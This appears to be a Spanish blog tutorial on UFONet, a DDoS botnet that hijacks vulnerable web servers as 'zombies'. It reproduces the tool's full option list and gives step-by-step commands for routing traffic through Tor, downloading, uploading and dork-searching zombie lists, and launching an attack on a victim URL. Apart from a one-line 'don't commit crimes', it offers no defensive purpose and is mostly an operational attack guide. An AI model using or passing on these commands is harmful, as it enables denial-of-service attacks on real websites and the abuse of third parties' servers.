Ufonet es una botnet para ataques DoS,
que utiliza servidores vulnerables para realizar el ataque.
Nos descargamos Ufonet de:
Descomprimimos
unzip ufonet-master.zip
accedemos a la carpeta ufonet-master
Debemos tener instalado Python 2.x.e
instalar las dependencias (si es que no las tenemos ya instaladas)
apt-get install python (posiblemente ya
lo tengáis instalado).
apt-get install python-pycurl
python-geoip
El modo de usarlo es el siguiente (es
la salida de ./ufonet -h)
Usage: UFONet.py [options]
UFONet - DDoS Botnet via Web Abuse - by psy
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v, --verbose active verbose on requests
--update check for latest stable version
--check-tor check to see if Tor is used properly
--force-yes set 'YES' to all questions
--disableisup disable external check of target's status
--gui run GUI (UFONet Web Interface)
*Configure Request(s)*:
--proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118')
--user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default SPOOFED)
--host=HOST Use another HTTP Host header (default NONE)
--xforw Set your HTTP X-Forwarded-For with random IP values
--xclient Set your HTTP X-Client-IP with random IP values
--timeout=TIMEOUT Select your timeout (default 10)
--retries=RETRIES Retries when the connection timeouts (default 1)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--delay=DELAY Delay in seconds between each HTTP request (default 0)
*Search for 'Zombies'*:
-s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=')
--sd=DORKS Search from a list of 'dorks' (ex: --sd 'dorks.txt')
--sn=NUM_RESULTS Set max number of results for engine (default 10)
--se=ENGINE Search engine to use for 'dorking' (default: duck)
--sa Search massively using all search engines
*Test Botnet*:
-t TEST Update 'zombies' status (ex: -t 'zombies.txt')
--attack-me Order 'zombies' to attack you (NAT required!)
*Community*:
--download-zombies Download 'zombies' from Community server: Turina
--upload-zombies Upload your 'zombies' to Community server: Turina
--blackhole Create a 'blackhole' to share your 'zombies'
--up-to=UPIP Upload your 'zombies' to a 'blackhole'
--down-from=DIP Download your 'zombies' from a 'blackhole'
*Research Target*:
-i INSPECT Search for biggest file (ex: -i 'http://target.com')
*Configure Attack(s)*:
--disable-aliens Disable 'aliens' web abuse of test services
--disable-isup Disable check status 'is target up?'
-r ROUNDS Set number of rounds (default: 1)
-b PLACE Set place to attack (ex: -b '/path/big.jpg')
-a TARGET Start Web DDoS attack (ex: -a 'http(s)://target.com')
Es aconsejable iniciar el servicio tor y privoxy.
En primer lugar, descargamos y
actualizamos zombies:
./ufonet --proxy=http://127.0.0.1:8118
--download-zombies
Contestamos que sí (y)
./ufonet --proxy=http://127.0.0.1:8118
--upload-zombies
Para buscar zombies:
./ufonet --d dorks.txt
Acto seguido, nos pedirá si queremos
actualizar nuestra base de datos de zombies, a lo cual diremos que
sí.
Recomiendo no hacer esto último con
proxys, porque puede dar error.
Para realizar el ataque debemos poner
./ufonet --proxy=http://127.0.0.1:8118
-a <direccion victima con http:// o con https:// incluído>
Si queremos, podemos usar la Gui:
./ufonet --gui
Editando el archivo dorks.txt y
añadiendo más dorks, podremos buscar posbiles zombies
IMPORTANTE: No cometáis delitos.
Sígueme:
- Twitter: @manugomez1977
- Instagram: MANGOMEZ1977
- Facebook: facebook.com/Mangomez1977








No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.